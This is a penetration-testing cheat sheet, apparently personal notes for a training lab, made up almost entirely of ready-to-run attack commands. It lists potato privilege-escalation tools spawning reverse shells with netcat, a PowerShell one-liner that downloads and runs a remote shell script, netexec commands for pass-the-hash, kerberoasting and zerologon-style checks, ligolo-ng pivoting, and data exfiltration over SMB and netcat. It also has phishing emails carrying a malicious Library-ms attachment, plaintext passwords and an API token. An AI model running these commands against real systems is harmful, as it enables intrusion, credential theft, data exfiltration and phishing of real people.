Command_Lookup

All

xfreerdp3

xfreerdp3 /u:"emma" /p:'SomersetVinyl1!' /d:dmz.relia.com /v:192.168.244.248  /auth-pkg-list:\!kerberos

Sigma Potato

./SigmaPotato.exe --revshell 192.168.45.166 444

God Potato

.\gp4.exe -cmd "cmd /c \tools\nc.exe 192.168.45.153 2401 -e cmd"

pdf metadata

exiftool -a -G1 WelcomeLetter.pdf

NXC

for local administrator and so on

netexec smb target -u username -p password --local-auth

smb scanning

netexec smb target -u '' -p '' --shares
netexec ssh target -u username -p password --continue-on-success
netexec smb $TARGETS -u $USERNAME -H 'NTHASH'

Roasting

netexec ldap target -u username -p password --kerberoasting hash.txt
netexec ldap target -u username -p password --asreproast hash.txt

Bloodhound

netexec ldap target -u username -p password --bloodhound --dns-server ip --dns-tcp -c all

ftp

netexec ftp target -u username -p password --ls

Vulnerability Scanning

netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac

MSSQL Scanning

netexec mssql target -u username -p password

upgrade reverse shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

ConPtyShell Windows

IEX(IWR http://192.168.45.153:8001/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 192.168.45.153 3001

Kali

stty raw -echo; (stty size; cat) | nc -lvnp 3001

Shell upgrade trough runnning service as system

sc create MyApacheService binPath= "C:\wamp64\bin\apache\apache2.4.51\bin\httpd.exe -k runservice"

sc start MyApacheService

sc query MyApacheService

ligolo-ng

Initial Setup Create TUN Interface

sudo ip tuntap add user cy21 mode tun ligolo

Activate the Interface

sudo ip link set ligolo up

Proxy Server Commands

Start Ligolo Proxy

ligolo-proxy -selfcert -laddr 0.0.0.0:443

Start with alternate network interface

start --tun ligolo2

Add Listener

listener_add --addr 0.0.0.0:2380 --to 127.0.0.1:2380

Add route

sudo ip route add 172.16.113.0/24 dev ligolo

Add route for internal port access

sudo ip route add 240.0.0.1/32 dev ligolo

Agent Commands

.\agent.exe -connect 192.168.45.229:443 -v -ignore-cert

Exfiltration

SMB Setup smb connection

net use n: \\192.168.45.212\smb /user:test test

copy to host

copy test.zip \\192.168.45.212\smb\

Netcat Receive

nc -lp 2380 > backup.log

Send

nc 192.168.1.10 1234 < file_to_send.txt

Mail Sending

using swaks

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.214.242 --header "Subject: Staging Script" --suppress-data -ap

using sendemail

sendemail -f 'maildmz@relia.com' \    
-t 'jim@relia.com' \
-s 192.168.224.189:25 \
-u 'a spreadsheet' \
-m 'Please check this spreadsheet' \
-a config.Library-ms \
-xp DPuBT9tGCBrTbR

WPscan

wpscan --url http://192.168.205.244/ --api-token 2XMK36zxVS92XbMGbXWdFam0398eeV1FaNufGvsKVeQ
 --enumerate p --plugins-detection aggressive

Smbclient interaction

All individually to download everything

mask ""
recurse ON
prompt OFF
mget *

Miscellaneous

Tar command execution https://medium.com/@althubianymalek/linux-privilege-escalation-using-tar-wildcards-a-step-by-step-guide-55771aae063f

lsassy https://github.com/login-securite/lsassy

All​

NXC​

upgrade reverse shell​

ligolo-ng​

Exfiltration​

Mail Sending​

WPscan​

Smbclient interaction​

Miscellaneous​

All

NXC